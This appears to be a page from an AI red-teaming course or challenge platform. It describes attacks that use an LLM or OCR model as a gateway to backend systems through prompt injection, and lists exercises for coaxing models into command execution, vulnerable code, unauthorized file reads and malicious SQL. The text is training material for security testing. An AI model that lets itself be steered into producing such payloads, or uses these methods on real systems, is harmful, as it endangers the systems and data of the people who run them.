Overview

This attack class involves using an AI model not as the final target, but as an unwitting intermediary or a “gateway” to attack a separate, downstream system. The AI model, often an LLM or an OCR engine, processes untrusted user input and transforms it into a format—such as code, a database query, or a shell command—that is then executed by another part of the application.
  • Why it Matters: This is one of the most severe risks in AI-integrated systems. A successful exploit can lead to traditional, high-impact consequences, including:
    • Remote Code Execution (RCE)
    • Data Exfiltration
    • Server-Side Request Forgery (SSRF)
    • Denial of Service (DoS)

Technical Mechanics & Foundations

The exploitability of these systems hinges on a common architectural pattern: User Input -> AI Model (Interpreter) -> Backend System (Executor). The attacker’s goal is to craft an input that the AI model will innocently translate into a malicious payload for the backend.
  • The AI as a “Natural Language Shell”: An attacker can use prompt injection to trick an LLM with tool-access into generating and executing malicious commands.
  • The AI as a “SQL Co-pilot”: An attacker can craft a prompt that causes an LLM to generate a vulnerable SQL query, leading to SQL Injection.
  • The AI as an “OCR-to-API” Pipeline: An attacker can create an image with text that, when extracted by an OCR model, forms a malicious payload for a downstream system.

Challenge Arena

  • Crawl: Basic Command & Code Generation
    • brig1: Instruct an LLM to use a connected tool in an unintended way to execute a command on the backend system.
    • turtle: Coax a security-aware LLM into generating Python code with a specific, known vulnerability.
  • Walk: Exploiting Structured Data & Database Queries
    • brig2: Manipulate an LLM’s tool-use capabilities to access and read data from an unauthorized file path.
    • librarian: Craft a natural language question that causes an LLM to generate and execute a malicious SQL query.
  • Run: Multi-Modal and Advanced Exploitation
    • pixelated: Exploit a multi-stage pipeline by creating an image that an OCR model misinterprets as a malicious command.